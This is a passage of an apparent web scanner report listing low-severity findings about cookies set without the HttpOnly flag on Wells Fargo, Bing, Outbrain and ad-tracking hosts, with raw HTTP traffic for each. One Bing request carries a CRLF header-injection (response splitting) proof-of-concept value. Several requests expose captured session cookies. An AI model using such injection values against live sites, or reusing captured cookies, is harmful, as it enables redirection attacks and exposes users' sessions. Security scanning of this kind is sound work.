GET /utils/get?url=http%3A%2F%2Fwww.healthcentral.com%2Fadhd%2Fcf%2Fslideshows%2Fcommon-symptoms-of-add-and-adhd-in-women%2Fhypersensitivity-to-noise-touch-smell%2F%3Fap%3D825&settings=true&recs=true&widgetJSId=AR_2&key=AYQHSUWJ8576&idx=0&version=40317&ref=http%3A%2F%2Fpaid.outbrain.com%2Fnetwork%2Fredir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&apv=false&rand=0.27036919072270393&sig=yiATPu1V HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="f/caN6PzBMk1F/lAXdWPeAONbvolwvwaGjSnoNU+2VO5SAU8hYi/29wx8t2EuHl8OSTmulhXsyCI4REknst1vwJvLAxo68T3J3ha2ARMD8w4gGNnxHK/u2EjsFbY+Vb7l0R/+1aTyjM="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1311040702757; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:22 GMT; Path=/
Set-Cookie: _lvd2="mPJshv1MhYq1peurTu/velXty3gxO0dAK4DoJEN0VUFQbO5UBgsqPVz1xfQCga1ux7y4+04dhUgLhsPAmU3vmR1v80Y9KizJsnotn6N6rbe6dmdB0YKlHmEjsFbY+Vb7SLmJfD9afX4="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 25-Jul-2011 14:46:22 GMT; Path=/
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:22 GMT; Path=/
Set-Cookie: recs-e12d2d49134d4a5a55456c7e33d8990d="YGLIWLSCU9zh36cDmh3P3l85RKZEnC7kKxkoX5M8pN/WSlRYwycmulhMaFxig1+H"; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 02:03:22 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 01:58:22 GMT
Content-Length: 2687

outbrain_rater.returnedOdbData({'response':{'exec_time':10,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'211901593','req_id':'36fb7aed35f919c0d97b40044959a4c2'},'score':{'preferred
...[SNIP]...

8.7. https://online.wellsfargo.com/das/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/signon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /das/signon HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://online.wellsfargo.com/das/channel/enrollDisplay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=LOB=CONS; BRAND_COOKIE=COB

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:50:06 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN=source=alternate; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

8.8. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signon?LOB=CONS HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/locator/atm/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN= LOB=CONS; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

8.9. http://paid.outbrain.com/network/redir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /network/redir

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6 HTTP/1.1
Host: paid.outbrain.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="f/caN6PzBMk1F/lAXdWPeAONbvolwvwaGjSnoNU+2VO5SAU8hYi/29wx8t2EuHl8OSTmulhXsyCI4REknst1vwJvLAxo68T3J3ha2ARMD8w4gGNnxHK/u2EjsFbY+Vb7l0R/+1aTyjM="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 01:58:19 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Length: 436
Date: Tue, 19 Jul 2011 01:58:18 GMT

<html>
   <body onload="document.location.replace('http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825')">
       <form meth
...[SNIP]...

8.10. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15482;CRE=42330443;PLA=58217920;ADI=240048897; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: spass=639dc8c25a6771ff844957f2a2748213; G12546=C1S98727-3-0-0-0-1311017115-2; G15482=C1S103937-42-0-0-0-1311016999-308

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:58:25 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15482=C1S103937-44-0-0-0-1311016999-23706; path=/; domain=.suitesmart.com; expires=Sun, 15-Jan-2012 01:58:25 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 19 Jul 2011 01:58:25 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

8.11. http://server.iad.liveperson.net/hc/3194108/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/3194108/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/3194108/?&site=3194108&cmd=mTagInPage&lpCallId=726132489740-21619860781&protV=20&lpjson=1&page=http%3A//www.codero.com/&id=4111753688&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&PV%21visitorActive=0 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5314624600296146657; LivePersonID=-16101514677756-1311040810:-1:-1:-1:-1; HumanClickSiteContainerID_3194108=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1311040808225

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:02:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_3194108=STANDALONE; path=/hc/3194108
Set-Cookie: LivePersonID=-16101514677756-1311040810:-1:-1:-1:-1; expires=Wed, 18-Jul-2012 02:02:49 GMT; path=/hc/3194108; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 02:02:49 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"726132489740-21619860781","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-30", "js_code": "lpMTag.lpInPageRequestDelay=30;"}]}});

8.12. http://server.iad.liveperson.net/hc/3194108/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/3194108/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/3194108/?&site=3194108&cmd=mTagKnockPage&lpCallId=676269724499-240244198357&protV=20&lpjson=1&id=4111753688&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=5955467406805688328; path=/hc/3194108
Set-Cookie: HumanClickACTIVE=1311040809411; expires=Wed, 20-Jul-2011 02:00:09 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 02:00:09 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1484

lpConnLib.Process({"ResultSet": {"lpCallId":"676269724499-240244198357","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...

8.13. http://statse.webtrendslive.com/dcsk7l4il00000wwytasjl7cu_1n7o/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsk7l4il00000wwytasjl7cu_1n7o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsk7l4il00000wwytasjl7cu_1n7o/dcs.gif?&dcsdat=1311040801591&dcssip=www.codero.com&dcsuri=/&WT.co_f=173.193.214.243-1234505376.30151644&WT.vtid=173.193.214.243-1234505376.30151644&WT.vtvs=1311040801593&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=21&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Dedicated%20Hosting%20with%20Backup%20%26%20Managed%20Services%20from%20Codero&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x723&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.codero.com/&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.codero.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAARAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAHv8HE7u+xxOzEsAAH2IHU5PiB1OyuYAAA+THU4Pkx1ODwAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAAB7/BxO7vscTmseAAB9iB1OT4gdTlhMAAAPkx1OD5MdTgEAAAAEyAAAIzE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 01:59:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAASAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAHv8HE7u+xxOzEsAAH2IHU5PiB1OyuYAAA+THU4Pkx1On/oAABrlJE4a5SROEAAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAAB7/BxO7vscTmseAAB9iB1OT4gdTlhMAAAPkx1OD5MdTkpQAAAa5SROGuUkTgEAAAAEyAAAIzE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0; path=/; expires=Fri, 16-Jul-2021 01:59:54 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

8.14. https://wellsoffice.wellsfargo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 19 Jul 2011 09:42:24 GMT
Content-length: 0
Content-type: text/html
Cache-Control: no-cache
Location: https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f
Set-Cookie: TLTSID=687AB7CCB1EB10B1991CF87992750532; Path=/; Domain=.wellsfargo.com; Secure
Set-Cookie: TLTSID=687AC5BEB1EB10B1991DF87992750532; Path=/; Domain=.wellsfargo.com; Secure
Set-Cookie: TLTSID=687AC65EB1EB10B1991EF87992750532; Path=/; Domain=.wellsfargo.com; Secure


8.15. http://www.bing.com/community/css-classnameexpansion.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /community/css-classnameexpansion.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/css-classnameexpansion.ashx?css=%2fcommunity%2fthemes%2fgeneric%2fcss%2flayout.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/css; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Telligent-Evolution: 5.5.134.12674
X-AspNet-Version: 2.0.50727
XSHOST: WS1
Vary: Accept-Encoding
Content-Length: 15825
Date: Tue, 19 Jul 2011 12:10:45 GMT
Connection: close
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+19+Jul+2011+12%3a10%3a45+GMT; expires=Wed, 18-Jul-2012 12:10:45 GMT; path=/community
Set-Cookie: CommunityServer-LastVisitUpdated-1001=; path=/community
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+19+Jul+2011+12%3a10%3a45+GMT; expires=Wed, 18-Jul-2012 12:10:45 GMT; path=/community
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:44 GMT; domain=.bing.com; path=/

.page-management-header { }.page-management { text-align: left; font-family: Arial, Helvetica !important; font-size: 12px !important; position: relative; border-top: solid 2px #aaa; background-color:
...[SNIP]...

8.16. http://www.bing.com/events/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/search?q=http://xss.cx/%3f%0D%0ALocation:%20http://xss.cx/default.aspx?cwe-113-poc-via-bing.com HTTP/1.1
Host: www.bing.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SRCHUID=V=2&GUID=E8D2DDB02E5B451C9F1EB509739AB1CC; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110601; SRCHD=SM=1&MS=1842502&D=1841741&AF=MSN005; MUID=3957719BE8F34A5DA51D204E7E06704A; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; _FP=; _RwBf=credit=-1&s=0; _UR=OMW=1

Response

HTTP/1.1 200 OK
Content-Length: 0
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 12:05:34 GMT
Connection: close
Set-Cookie: _SS=SID=6972CFBED6CD45B1A2140850C807FA64; domain=.bing.com; path=/


8.17. http://www.bing.com/fd/AnswerBarHandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/AnswerBarHandler

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/AnswerBarHandler?q=Jonah%20Hill&vertical=VirtualEarth&subvertical=maps HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bing.com
